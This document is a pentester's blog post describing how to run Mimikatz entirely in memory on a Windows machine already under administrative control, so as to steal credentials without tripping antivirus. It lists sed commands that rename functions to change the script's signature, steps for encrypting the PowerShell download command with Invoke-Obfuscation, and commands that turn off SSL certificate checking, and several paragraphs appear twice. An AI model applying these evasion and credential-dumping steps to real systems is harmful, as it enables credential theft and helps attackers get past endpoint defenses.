About
The other day I was part of an engagement that required a post exploitation (already obtained administrative access to the system) of the target system and steal credentials. There are many posts online that have done this and I will be referencing them as we go. This is just a supplement to everything else out there.
Mimikatz is a tool that collects credentials, including cleartext passwords, Lan manager hashes, Kerberos tickets and a number of other items. This post is to leverage Mimikatz, but instead of downloading the binary to the targets disk and jeopardizing AntiVirus to trip, or other host based controls stopping us, we will download the script directly in memory and run it without ever touching disk.
Additionally, there are a few obfuscation techniques that can be used with simple Linux fu to help generate this "custom" version of Mimikatz to help bypass AV. Lastly, there is another technique to help obfuscate the actual powershell command that calls the download to run the exploit.
Prerequisites
During my engagement, I didn't want to download Mimikatz, nor a custom version of Mimikatz off the Internet. I wanted to already have a local copy on my attacking machine. Because of this, there are a few prerequisites to consider prior to beginning:
- Have a web server you can use to serve the Mimikatz file
- I used Kali and had an Apache server running
- This is helpful so you can download Mimikatz locally to your attacking machine and not have to call it through the Internet when performing this engagement
- Additionally, you can create the custom version of Mimikatz and host it somewhere on the web to download. This will help bypass any blacklist controls.
- Setup the Web Server to be running SSL
- I noticed that there were some controls on the network that caused issues when downloading the script via powershell over HTTP. After some troubleshooting, I figured that by encrypting the traffic (using HTTPS instead of HTTP), we may be able to bypass any possible network controls.
- We are hoping that by performing encryption on the website, we will be able to hide our custom Mimikatz script.
- Need to be running as Administrator/System on the target machine
- Mimikatz is a post exploitation, password dumping tool. It requires Administrative access on the target machine
Legend
- Target: The victim machine you have gained Administrative access to
- Kali: One of my testing/attacking machines (Linux distro)
- Windows Lab Machine: Another testing/attacking machine I used to help test. This was a Windows 7 OS
The Attack
We begin by pulling down a copy of Mimikatz from the Internet onto our Kali/Testing/Attacking machine. A copy of the file can be found here [1].
Verify the file is saved in the web directory, that it has read access and that your web server is up and running.
Next, run some obfuscation techniques on the downloaded "Invoke-Mimikatz.ps1" file. A great write-up was written by Carrie Roberts of Black Hills and can be found here [2]. By performing these match/replace techniques, we are hoping to obfuscate the file enough that it alters the signature of the file. Feel free to change some of the "replace" words to your own. This will help keep this file from always being the same obfuscated file.
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 sed -i -e 's/ArgumentPtr/BirdIsTheWord/g' Invoke-Mimikatz.ps1 sed -i -e 's/CallDllMainSC1/UnceUnceUnce/g' Invoke-Mimikatz.ps1 sed -i -e "s/\-Win32Functions \$Win32Functions$/\-Win32Functions \$Win32Functions #\-/g" Invoke-Mimikatz.ps1
Once obfuscation is complete, rename the file so it doesn't have the default "Invoke-Mimikatz.ps1" name:
Next, we will use a tool called Invoke-Obfuscator. This is a great tool by Daniel Bohannon. His git can be found here [3]. I downloaded this tool to my Windows Lab Machine. This way I can generate my payload offline in a lab and copy its contents directly on my target machine. Once downloaded, navigate to the directory and run the Invoke-Obfuscation script:
Once Invoke-Obfuscation is up, we set the SCRIPTBLOCK (the powershell command we want to run on the target machine)
Next, we choose the "ENCODING" option to obfuscate the entire command via Encoding:
We then choose Option 5, which will encrypt the entire command as SecureString (AES):
We then copy out the results and reformat it so it is a one-line payload.
Next, on the Target Machine, we open an administrative command prompt, open powershell, verify the ExecutionPolicy is Unrestricted, and bypass invalid SSL certificates (I understand I could have included some of these commands/flags into my obfuscation script, I just didn't do it in this example).
Next, we choose the "ENCODING" option to obfuscate the entire command via Encoding:
We then choose Option 5, which will encrypt the entire command as SecureString (AES):
We then copy out the results and reformat it so it is a one-line payload.
Next, on the Target Machine, we open an administrative command prompt, open powershell, verify the ExecutionPolicy is Unrestricted, and bypass invalid SSL certificates (I understand I could have included some of these commands/flags into my obfuscation script, I just didn't do it in this example).
C:\>powershell Windows PowerShell Copyright (C) 2013 Microsoft Corporation. All rights reserved. PS C:\> Get-ExecutionPolicy Unrestricted PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;
We then copy the Powershell Invoke Obfuscation script into the Target Machines powershell command prompt:
We have successfully executed mimikatz, in memory, bypassing AV.
While this may not have been the perfect way to accomplish the task and there certainly may be other better ways, this worked for my use case.
I hope this helps!
Until next time.
geoda
Links
[1] https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
[2] https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
[3] https://github.com/danielbohannon/Invoke-Obfuscation